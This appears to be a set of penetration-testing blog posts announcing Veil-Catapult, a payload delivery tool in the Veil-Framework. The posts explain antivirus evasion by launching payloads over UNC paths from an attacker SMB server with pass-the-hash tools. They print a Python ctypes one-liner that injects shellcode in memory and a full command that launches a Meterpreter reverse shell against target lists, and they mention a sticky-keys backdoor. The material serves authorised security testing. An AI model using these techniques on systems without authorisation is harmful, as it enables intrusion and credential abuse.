Bypassing On-disk Detection With Veil-Catapult

Say you’re on an internal pentest for a client, and the backdoor .exe you’ve been using has suddenly been snatched up by some antivirus solution. You’re short on time, you haven’t heard of Veil-Evasion, and you really need access. Are you toast, or is there some other option?

There still might be hope. One of the techniques released with Veil-Catapult at Shmoocon 2014 is the host-and-UNC-invoke approach. Choose the [h]ost method when prompted and enter your local IP (tab-completable) so the target machines know where to reach back to:

catapult_host_launch

We use the Impacket library to throw up a temporary SMB server to host an .EXE, and then issue a pth-wmis or pth-winexe command that invokes a command with a \\UNC path back to our attacker box. This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executables to bypass detection:

catapult_host_execute

One interesting note we discovered when working with this technique: you can use this to get some otherwise disk-detectable executables past some solutions, but not all. Microsoft Security Essentials will detect a stock-generated msfvenom executable executed-in-memory using host/execute but not other disk-detectable methods (like c/shellcode_inject/void):

mse

More evidence that AV vendors are trying to block pentesting tools without actually doing the correct behavioral detection.

#avlol :)

Barebones Python Injection

We love powershell. It’s awesome for payload delivery for a myriad of reasons; trusted execution, AV-bypassing abilities, reputation filter bypass, full .NET capabilities, etc. However, on assessments we still sometimes encounter machines without powershell installed or enabled. Wouldn’t it be nice to still have a method to invoke payloads without powershell that still granted trusted execution and the other nice features we get with that approach?

The Barebones Python injector released with Veil-Catapult addresses this problem. If you don’t have powershell access on a system for some reason, don’t really like dropping malicious EXEs to disk, or nasty AV white listing/reputation filers are causing you pain, this method provides you an alternative option for owning boxes with a trusted execution model.

To execute, a zipped ‘barebones’ Python environment is first uploaded to the victim machine’s temp directory using Impacket, along with a stand alone 7zip binary. This environment was stripped by hand to only include the bare minimum libraries needed in order to invoke shellcode utilizing Python cytpes. A pth-wmis or pth-winexe command is used to unzip the environment, and a second command will invoke the extracted Python binary with the “-c” option. The passed string comprises a minimum Python program that will base64 decode a shellcode string and invoke it in memory:

python.exe -c "from ctypes import *; a=’u/Fp...’.decode(‘base_64’);cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()"

The end result? The only files that touch disk are known/trusted Python libraries and interpreter, and your Veil-Evasion generated shellcode is invoked without a malicious executable potentially being snarfed up by AV.

 

Veil-Catapult

Payload delivery for when Metasploit’s psexec and its stock .exe templates fail is a common problem for penetration testers.  A while back Attack Research released a great post entitled “psexec fail? upload and exec instead“, which detailed how to upload and execute specified payloads. The excellent tool SMBexec can accomplish the same goal, utilizing a patched version of samba to upload .exe’s and trigger them. These options are great, but we wanted to build something that utilized the Veil framework for payload generation and filled in a few of the gaps we felt were missing.

We’d like to announce the newest addition to the Veil-Framework, our payload delivery tool Veil-Catapult. Utilizing the Impacket library from Core Labs and the passing-the-hash toolkit, as well as the full functionality of Veil-Evasion, Veil-Catapult meets all of your AV-evading payload delivery needs:

catapult_main_menu

EXE delivery features seamless integration with Veil-Evasion. If you don’t want to specify a custom executable, you can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, you have access to all the latest methods and modules as they’re released. After you’ve specified your options and built an executable, you’re dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be specified, a domain can optionally be specified, and credentials can use hashes as well as normal passwords:

catapult_exe_menu

Triggering utilizes the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis doesn’t create a service, but pth-winexe will run as system, so which to choose is situation dependent. Payloads can also be uploaded and triggered on a victim, or hosted on a temporary Impacket SMB server on your attacker box and triggered with \\UNC paths. A nice side effect of UNC triggering is that some otherwise disk-detectable .exe’s will get right by a lot of antivirus : )

Note: python pyinstaller payloads can’t be hosted and MUST be uploaded in order to work properly.

catapult_host_execute

Standalone payloads offers some tried and true methods as well as a slightly new approach. Powershell can be invoked using the standard command line shellcode-injecting payload generated by Veil-Evasion, and the sticky keys sethc backdoor can be triggered as well, both with the same wmis or winexe options.

The Barebones python injector is a neat approach which we’ll be talking about in detail in an upcoming blog post. But feel free to check it out now : )

Cleanup functionality has also been incorporated. Whenever an exe is uploaded/host and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on popped hosts, and then delete any uploaded binaries. The sethc backdoor also generates a cleanup script.

catapult_cleanup

And of course, we have command line flags for every option- try ./Veil-Catapult.py -h for all the details:

catapult_flags

The following example takes an IP list, a hashdump/pwdump formatted cred file with an admin hash, pth-wmis for triggering, uses the c/shellcode_inject/void payload and specific MSF parameters to generate an .exe with Veil-Evasion, hosts the executable and triggers it on your IP, and doesn’t confirm before launching:

./Veil-Catapult.py -tL ips.txt -cF d.txt –wmis -p c/shellcode_inject/void –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=172.16.199.236 LPORT=4444 –act hostexec –lip 172.16.199.236 -nc

  •  –tL : provides a list of IPs to target
  • -cF : provides a pwdump file that Veil-Catapult extracts the admin account out of
  • –wmis : specifies for pth-wmis to be used for triggering
  • –p … : specifies the Veil-Evasion payload to be used
  • –msfpayload : details the Metasploit shellcode to be used by the Veil-Evasion payload
  • –msfoptions : provides additional configuration details for the Metasploit payload
  • –act hostexec : instructs Veil-Catapult to host the payload and execute by \\UNC path
  • –lip : the local IP needed for UNC invocation
  • -nc : don’t confirm before firing off the attack

Veil-Catapult’s introduction marks our long-intended goal of expanding the Veil-Framework beyond just AV-evasion. We’ve moved our original Veil repository to https://github.com/Veil-Framework/Veil-Evasion/ and established a new repository for Veil-Catapult at https://github.com/Veil-Framework/Veil-Catapult/ . A superproject will be maintained at https://github.com/Veil-Framework/Veil/ that will pull in each tool in the Veil-Framework. We recommend that most users pull down the superproject to make sure everything works correctly together. If you choose to run the tools in different locations, be sure to edit /etc/veil/settings.py as appropriate if anything happens to malfunction.